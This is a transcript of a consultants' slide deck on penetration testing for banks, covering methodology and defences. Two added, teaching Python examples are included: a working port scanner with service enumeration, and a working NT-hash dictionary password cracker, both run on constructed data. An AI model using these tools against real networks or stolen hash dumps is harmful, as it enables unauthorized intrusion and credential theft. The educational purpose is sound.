
Penetration Testing The Importance of Your Bank’s Perimeter Security


Presentation Transcript


  1. Penetration Testing: The Importance of Your Bank’s Perimeter Security
  Presented by: Brian Hunter & Philip Diekhoff, BKD Risk Management Group

  2. A Brief History of Hacking

  3. The Penetration Tester
  • Testing is done by an ethical hacker (EH) who attempts to circumvent the security of a computer system or network
  • The EH starts with no more access than an ordinary user would have; the only other constraints are those agreed for the engagement
  • The EH uses the same methodology & tools that hackers use

  4. Types of Penetration Testing
  • External Penetration Testing: takes the role of a hacker trying to gain access from the Internet
  • Internal Penetration Testing: takes the role of a disgruntled employee or third-party vendor trying to gain access from inside the network

  5. Different Types of Penetration Testing: what kinds of testing can be done?
  • No knowledge: a hacker on the Internet. The test is performed with no information about the organization
  • Knowledgeable: a former employee. The test is performed with some knowledge but no access
  • Insider: consultants or vendors. The test is performed from inside, with physical access to the network but limited knowledge
  • Knowledgeable insider: staff. The test is performed from inside, with knowledge. This tests how secure the network is & whether employees can reach resources they shouldn’t be able to

  6. Security Offerings: what’s out there?
  • Network Scanning
  • Vulnerability Scanning
  • Penetration Testing
  What is the difference?

  7. Network Scanning: what is it?
  • Uses port scanners (e.g. Nmap, SuperScan)
  • Scans the network to determine what devices are there, what ports are open & what services are listening on those ports
  • Fast & efficient, but doesn’t probe for vulnerabilities

  8. Vulnerability Scanning: what is it?
  • Identifies network hosts & services
  • Identifies network operating systems
  • Identifies applications running on those devices
  • Identifies potential vulnerabilities pertinent to those systems & applications
  • Matches what it finds against a database of known vulnerabilities; it does not actually test (exploit) them
  • Fairly fast & provides a list of vulnerabilities, but produces many false positives

  9. Penetration Testing: what is it?
  • A set of procedures designed to circumvent the existing security controls of a specific system or organization
  • Encompasses network scanning & vulnerability scanning, but adds the human element & verification of the vulnerabilities found
  • The true hacker approach: it verifies vulnerabilities, but takes time & expertise

  10. Why do I Need Penetration Testing?
  • Risk assessment
  • Verification of security controls
  • Identification of vulnerabilities
  • Regulatory compliance
  • Planning security expenditure

  11. It Won’t Happen to Me
  • “No one would be interested in a small organization like us”
  • “The IT department has everything under control”
  • People become complacent about their network
  Consider this!

  12. Check This Out
  • http://www.privacyrights.org/ar/ChronDataBreaches.htm
  • Hacked sites

  13. Data Breaches 2006: Analysis

  14. Questions to Ask
  • What is their methodology?
  • Is the methodology proven? Has it been used successfully before?
  • Ask for references; more is better!
  • How long have they been performing this kind of work?

  15. Things to Keep in Mind
  • The need for independence
  • Testing of any type can be disruptive & damaging
  • Are we talking about network scanning, vulnerability scanning or penetration testing? Compare scopes & methodologies
  • There is no single standard methodology for penetration testing, but some standardization exists

  16. Key Methodology Steps
  • Scope of work / engagement letter
  • Footprinting
  • Scanning
  • Enumeration
  • Penetration
  • Privilege escalation
  • Find sensitive data
  • Conference with client (discuss findings)
  • Report (contains findings & recommendations)

  17. Footprinting
  • Gathering public information to determine the organization’s demographics, locations, addresses, hosts, etc.
  • Organizational reconnaissance
  • Network reconnaissance
  • Domain names
  • IP addresses
  • Pinpointing servers (web, email, DNS, etc.)
  • Employee information
  • Searching newsgroups for company information

  18. Scanning
  • Assess & identify listening services to focus the attack on the most promising avenues of entry
  • TCP & UDP port scanning
  • Locate publicly accessible devices on the IP segment
  • Identify open ports on those devices
  • Stealth is required so as not to alert intrusion detection systems

  19. Enumeration
  • Enumerate network devices & determine what is running & what it is running on
  • Identify hardware
  • Identify the operating system
  • Identify services & their versions
  • Identify applications
  • Identify potential vulnerabilities
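Slides 7, 18 and 19 describe two steps that a scanner performs in sequence: first find out which ports answer at all (network scanning), then work out what is listening on each open port and which version it is (enumeration). The following is an added example, not code from the deck or from Nmap/SuperScan, showing both steps in Python against constructed targets: two in-process listeners on 127.0.0.1 that greet clients with made-up SSH and FTP banners, plus one port with nothing on it. The fake services, the banner patterns and the port-state names are assumptions made for illustration; on a real engagement `scan_host` would be pointed at the hosts named in the engagement letter.

```python
from __future__ import annotations
import re
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

# --- Constructed targets, so the example runs offline -----------------------
# Each "service" is an in-process TCP listener on 127.0.0.1 that greets every
# client with a fixed banner. It stands in for a real host on the perimeter.

def start_fake_service(banner: bytes) -> int:
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))          # port 0: let the OS pick a free port
    srv.listen(8)
    port = srv.getsockname()[1]

    def serve() -> None:
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:
                    pass                # client hung up before reading; fine

    threading.Thread(target=serve, daemon=True).start()
    return port


def free_port() -> int:
    """A port with nothing listening (assumption: nothing grabs it meanwhile)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]

# --- Step 1: network scanning (does the port answer?) -----------------------

def probe(host: str, port: int, timeout: float = 0.5) -> tuple[str, bytes]:
    """TCP connect() scan of one port.

    Returns (state, banner): 'open' (handshake completed), 'closed' (RST came
    back) or 'filtered' (no answer within the timeout, typically a firewall
    silently dropping the SYN). For open ports, whatever the service
    volunteers first is read as well, to feed the enumeration step.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except ConnectionRefusedError:
            return "closed", b""
        except OSError:                 # socket.timeout is an OSError
            return "filtered", b""
        try:
            return "open", s.recv(256)
        except OSError:
            return "open", b""          # open, but the service waits for us to speak first

# --- Step 2: enumeration (what is it, and which version?) -------------------

# Assumed banner shapes for three common services; a real tool carries
# thousands of these signatures.
BANNER_PATTERNS = [
    ("ssh",  re.compile(rb"^SSH-[\d.]+-(?P<product>[A-Za-z]+)[_/ ](?P<version>[\w.]+)")),
    ("ftp",  re.compile(rb"^220[ -].*?\b(?P<product>vsFTPd|ProFTPD)[ _/](?P<version>[\d.]+)")),
    ("smtp", re.compile(rb"^220[ -].*?\b(?P<product>Postfix|Exim|Sendmail)\b(?:[ /](?P<version>[\d.]+))?")),
]

def enumerate_banner(banner: bytes) -> dict:
    """Map the first banner line to (service, product, version)."""
    line = banner.split(b"\n", 1)[0].rstrip(b"\r")
    for service, pat in BANNER_PATTERNS:
        m = pat.search(line)
        if m:
            return {"service": service,
                    "product": m.group("product").decode(),
                    "version": (m.group("version") or b"").decode()}
    return {"service": "unknown", "product": "", "version": ""}


def scan_host(host: str, ports: list[int]) -> list[dict]:
    """Probe the ports concurrently, then enumerate every open one."""
    with ThreadPoolExecutor(max_workers=16) as pool:
        states = list(pool.map(lambda p: probe(host, p), ports))
    results = []
    for port, (state, banner) in zip(ports, states):
        entry = {"port": port, "state": state}
        if state == "open":
            entry.update(enumerate_banner(banner))
        results.append(entry)
    return results


def demo() -> list[dict]:
    """Constructed run: an SSH-like port, an FTP-like port and a closed port."""
    ssh_port = start_fake_service(b"SSH-2.0-OpenSSH_7.4\r\n")
    ftp_port = start_fake_service(b"220 (vsFTPd 3.0.3)\r\n")
    return scan_host("127.0.0.1", [ssh_port, ftp_port, free_port()])


if __name__ == "__main__":
    for entry in demo():
        print(entry)
```

Two points a practitioner reads off this. The "closed" versus "filtered" distinction is itself a finding: a port that times out instead of refusing tells you a firewall is in the path, which is exactly what slide 18 means by locating publicly accessible devices. And a connect() scan like this one completes the handshake, so every probe lands in the service's own logs and in any intrusion detection system; Nmap's default SYN scan stops one packet short of that for the same reason slide 18 asks for stealth.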

  20. Penetration
  • Use the information from the previous steps to gain access to systems
  • Using all the information gathered so far, prioritize targets by the severity of the vulnerabilities found
  • Systematically work through all potential vulnerabilities on all in-scope systems
  • Never perform Denial of Service (DoS) attacks
  • Demo: RPC Exploit

  21. Privilege Escalation
  • Depending on the privilege level obtained in the penetration phase, it may be necessary to raise the privilege level further to gain total control of the system
  • Demo: RPC Exploit
  • Demo: PWDump
  • Demo: File

  22. Find Sensitive Data (a.k.a. Pilfer)
  • Footprint & scan the internal network
  • Identify internal servers & their purpose
  • Attempt to locate sensitive information
  • Crack password files
  • Databases
  • Accounting programs
  • Demo: LC4
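The “crack password files” step on slide 22, demonstrated in the deck with LC4, works because Windows stores unsalted NT hashes: once an attacker has dumped them (the PWDump demo on slide 21), candidate passwords can be tested offline at full speed, and each hash computation is checked against every account at once. The following is an added example, not code from the deck or from L0phtCrack: a small dictionary attack with light mangling against a constructed pwdump-style dump. MD4 is written out rather than taken from `hashlib` because many OpenSSL builds no longer expose it. The user names, RIDs, wordlist and mangling rules are made up for illustration; the only real value is Administrator’s hash, which is the textbook NT hash of “password”. LM hashes, which LC4 also cracks and which are far weaker, are not attempted here because LM needs DES and the standard library has none.

```python
from __future__ import annotations
import struct
from typing import Iterable

# --- MD4, the primitive behind the Windows NT hash --------------------------

def md4(message: bytes) -> bytes:
    mask = 0xFFFFFFFF
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    F = lambda x, y, z: (x & y) | (~x & mask & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z

    # Padding: 0x80, zeros up to 56 mod 64, then the 64-bit little-endian bit length
    bit_len = len(message) * 8
    message += b"\x80"
    message += b"\x00" * ((56 - len(message) % 64) % 64)
    message += struct.pack("<Q", bit_len)

    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (F, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(message), 64):
        X = struct.unpack("<16I", message[off:off + 64])
        h = state[:]
        for fn, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                h[0] = rotl((h[0] + fn(h[1], h[2], h[3]) + X[idx] + k) & mask, shifts[i % 4])
                h = [h[3], h[0], h[1], h[2]]      # rotate registers a,b,c,d -> d,a,b,c
        state = [(s + v) & mask for s, v in zip(state, h)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE password; no salt, so identical
    passwords give identical hashes across every account and every machine."""
    return md4(password.encode("utf-16-le")).hex()

# --- Reading a pwdump-style file: user:RID:LM-hash:NT-hash::: -----------------

def parse_pwdump(lines: Iterable[str]) -> list[tuple[str, str]]:
    accounts = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) >= 4:
            accounts.append((parts[0], parts[3].lower()))
    return accounts

# --- The attack ---------------------------------------------------------------

def candidates(word: str) -> Iterable[str]:
    """Assumed mangling rules; real crackers apply hundreds of these."""
    yield word
    yield word.capitalize()
    yield word + "1"
    yield word + "!"
    yield word.capitalize() + "123"


def crack(accounts: list[tuple[str, str]], wordlist: Iterable[str]) -> dict[str, str]:
    """Hash each candidate once and look it up against all accounts at once."""
    targets: dict[str, list[str]] = {}
    for user, digest in accounts:
        targets.setdefault(digest, []).append(user)
    cracked: dict[str, str] = {}
    for word in wordlist:
        for cand in candidates(word):
            for user in targets.get(nt_hash(cand), ()):
                cracked.setdefault(user, cand)
    return cracked

# --- Constructed sample data (not from any real system) ----------------------

def build_sample_dump() -> str:
    lm_blank = "aad3b435b51404eeaad3b435b51404ee"   # LM field when LM hashing is disabled
    return "\n".join([
        "# constructed pwdump-style sample",
        # Administrator's NT hash is the well-known hash of "password", given as a
        # literal so that only a correct md4() above will unlock it.
        f"Administrator:500:{lm_blank}:8846f7eaee8fb117ad06bdd830b7586c:::",
        f"teller1:1001:{lm_blank}:{nt_hash('Spring123')}:::",       # weak, mangled dictionary word
        f"svc_backup:1002:{lm_blank}:{nt_hash('xK9#v!2qLm')}:::",   # not in any wordlist
    ])

WORDLIST = ["password", "welcome", "spring", "bank", "letmein"]   # constructed

def demo() -> dict[str, str]:
    return crack(parse_pwdump(build_sample_dump().splitlines()), WORDLIST)


if __name__ == "__main__":
    print(demo())   # Administrator and teller1 fall; svc_backup survives
```

Note what makes the attack cheap: because nothing is salted, the five words and five mangling rules cost twenty-five hash computations for the whole dump regardless of how many accounts it holds. That is the mechanism behind the “weak & easily guessed passwords” entry point on slide 28, and why password length and lockout policy, not the tool, decide the outcome.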

  23. Exit Meeting
  • Meet & discuss the findings
  • Go over the largest security findings first so you can begin fixing them immediately
  • Get all your questions answered

  24. Report
  • The real value of penetration testing is in the report
  • It should identify the vulnerabilities found
  • It should give recommendations for fixing those vulnerabilities

  25. What Will it Take to Keep Me Out? Not as much as you might think
  • New, expensive equipment is usually not required
  • Most security issues can be addressed quickly & easily
  • Most of the time & energy will be spent on security awareness

  26. What Will it Take to Keep Me Out? (cont.)
  • Understand that the risks are real
  • Be proactive with your IT security
  • Clear, concise policies that define security requirements & expectations of employees
  • Patches: keep all computers & network devices current with the latest service packs, patches & updates

  27. What Will it Take to Keep Me Out? (cont.)
  • Configure routers & firewalls to block all unnecessary traffic
  • Develop an incident response team
  • Have testing performed regularly
  • Use intrusion detection systems
  • Remember, all testing/scanning is a snapshot of the network at that point in time

  28. Common Entry Points: when locking down your network, pay attention to the most common points of entry for hackers
  • Misconfigured routers
  • Misconfigured firewalls
  • Misconfigured Internet servers
  • Unpatched software
  • Unsecured remote access
  • Accounts with excessive permissions
  • Weak & easily guessed passwords

  29. Key Takeaways
  • It is not a matter of “if” but “when”
  • Be proactive before you need to be reactive
  • Understand the importance of the methodology
  • Retest after significant changes
  • It’s a process, not a destination

  30. How to Contact Us
  Brian Hunter, Supervising Consultant, Springfield, MO, 417.865.8701, bdhunter@bkd.com
  Philip Diekhoff, Senior Consultant, Springfield, MO, 417.865.8701, pdiekhoff@bkd.com
